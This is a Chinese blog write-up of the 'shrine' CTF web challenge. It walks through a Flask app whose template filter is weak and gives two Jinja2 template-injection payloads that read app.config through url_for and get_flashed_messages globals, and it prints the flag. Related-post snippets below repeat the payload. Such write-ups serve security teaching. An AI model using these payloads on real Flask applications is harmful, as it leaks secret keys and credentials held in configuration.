攻防世界-web shrine

最新推荐文章于 2022-07-17 22:46:11 发布
最新推荐文章于 2022-07-17 22:46:11 发布
阅读量2.3k 收藏
点赞数
分类专栏: CTF 文章标签: 前端 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48108919/article/details/122893127
版权

代码分析:

import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG') #flag的位置,需要查看的目标
@app.route('/')  #路由:解析url,访问/路径时就执行index()
def index():
    return open(__file__).read()   #读取文件
@app.route('/shrine/')
def shrine(shrine): #路由:解析url,访问/shrine/路径时就执行shrine(shrine)
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')  #将传入的参数的( 和 )替换为空
        blacklist = ['config', 'self']  #黑名单列表
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s #把黑名单的东西遍历并设为空
    return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__': app.run(debug=True)

如果没有黑名单过滤可以直接使用{undefined{config}}查看所有app.config内容

知识点:

1.url_for()
url_for会根据传入的路由器函数名,返回该路由对应的URL,在模板中始终使用url_for()就可以安全的修改路由绑定的URL,则不比担心模板中渲染出错的链接

2.get_flashed_messages()
这个函数会返回之前在flask中通过flask()传入的消息的列表,flash函数的作用很简单,可以把由Python字符串表示的消息加入一个消息队列中,再使用get_flashed_message()函数取出它们并消费掉

方法一:使用url_for()

构造payload

http://111.200.241.244:51676/shrine/{{url_for.__globals__["current_app"].config}}

 方法二:使用get_flashed_messages()

构造payload

http://111.200.241.244:51676/shrine/{{get_flashed_messages.__globals__["current_app"].config}}

flag{shrine_is_good_ssti} 

码啊码
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界Webshrine
Light_inthe_eyes的博客
10-16 134
打开页面后,是一段代码: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj
攻防世界web进阶区之shrine
qq_45756971的博客
07-22 309
点开题目所给链接:首先查看它的源代码:我们首先尝试一下注入,在/shrine/路径下注入{{1+1}}:发现果然可以,我们还会发现他把config和self加入了黑名单 我们用搜索writeup大法给出的payload为{{get_flashed_messages.globals[‘current_app’].config[‘FLAG’]}} 即可得到flag flag{shrine_is_good_ssti} ...
攻防世界web-shrine
wallacegen的博客
11-16 185
一道ssti题目 打开之后显示源码,整理一下 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s):
[攻防世界web]shrine
JURUO222的博客
07-31 412
参考文章1 参考文章2 SSTI(服务器模板注入) sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornad
攻防世界web题-shrine
最新发布
m0_68074153的博客
07-17 149
SSTI模板注入
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
react-shrine:使用React构建的“ Shrine”渐进式Web应用程序示例
02-05
该项目是通过。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。 目录 更新到新版本 Create React App分为两个包: create-react-app是用于创建新项目的全局命令行实用程序。...
Ruby-Shrine用来处理文件上传的Ruby工具包
08-15
Shrine - 用来处理文件上传的Ruby工具包
shrine-commerce
04-04
MDC-100系列代码实验室入门要获得Flutter入门方面的帮助,请查看我们的在线。
Shrine View-crx插件
04-07
在每次打开一个新标签时,从谷歌地图的卫星视图体验一个有趣的日语Shinto神社。 每次打开一个新选项卡,从谷歌地图的卫星视图享受神社的形象。 神社从5000多点随机选择。 语言:日本語
攻防世界web进阶区shrine
gongjingege的博客
07-31 549
打开链接,查看源码 代码审计 看见了flask,考虑模板注入,@app.route后跟着路径,还有一部分过滤 试一下 /shrine/{{1+1}},回显为2,确实是ssti app.config['FLAG'] = os.environ.pop('FLAG') 注册了一个config,flag应该就在这里面,本来可以直接查看{{config}},但后面代码存在过滤 def safe_jinja(s): s = s.replace('(', '').replace(')', '')
攻防世界XCTF:shrine
末初的CSDN博客
03-14 6648
这题涉及到我的知识盲区,主要是以下几点: SSTI Flask 框架 Bypass Sandbox 整理得到源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return op...
python模板注入(多种方法,CTF可直接使用)
weixin_47696216的博客
05-21 1991
CTF各种SSTI解题思路与方法
XCTF-攻防世界CTF平台-Web类——16、shrine(Flask框架之Jinja2模板渲染引擎、查看app.config[‘FLAG‘])
Onlyone_1314的博客
12-11 1566
目录标题python模板注入代码分析:构造Python模板注入url_for()函数查看flagget_flashed_messages()函数查看flag 打开题目地址: 这是Python的flask渲染模板 python模板注入 python模板注入漏洞的产生在于Flask应用框架中render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,而且Flask模板中使用了Jinja2作为模板渲染引擎,{{}}在Jinja2中作为变量包裹标识符,在渲染的时候将{{}}包裹的内
攻防世界-web-shrine-从0到1的解题历程writeup
CTF小白的博客
04-13 4543
题目环境分析 首先开启靶机获取到题目如下 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<...
replace()和re.s()用法
Sunshine的博客
12-22 3654
replace()语法: replace(old, new, max) 参数: old → 旧字符串,将被替换的子字符串。 new →新字符串,用于替换old子字符串。 max → 可省略,默认全部替换,可选字符串,替换次数不超过max次。 &amp;gt;&amp;gt;&amp;gt;'jdkaka;ufahjka398jh'.replace('a','@') 'jdk@k@;uf@hjk@398jh' &amp;gt;&amp;...
BUUCTF__web题解合集(五)
风过江南乱的博客
08-10 979
1、[BJDCTF2020]The mystery of ip 2、[BJDCTF2020]Cookie is so stable 3、[WesternCTF2018]shrine 4、[BJDCTF2020]ZJCTF,不过如此 5、[CISCN 2019 初赛]Love Math
Flask学习笔记:消息提示与异常处理
qq_41805514的博客
06-22 1437
flask通过flash方法来显示提示消息:from flask import Flask, flash, render_template, request, abort app = Flask(__name__) app.secret_key = '520' @app.route('/') def index(): flash("Hello loli") return ren...
攻防世界 WEB shrine
qq_41696858的博客
08-17 117
这题也是SSTI 先在pycharm里调整下代码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @ app.route('/') def index(): return open(__file__).read() @ app.route('/shrine/') def shrine(shrine): def safe_jinja(s):
攻防世界 web进阶区 shrine
m0_51395584的博客
06-22 366
攻防世界 web进阶区 shrine python的flask框架代码审计,以及相关漏洞利用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

码啊码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值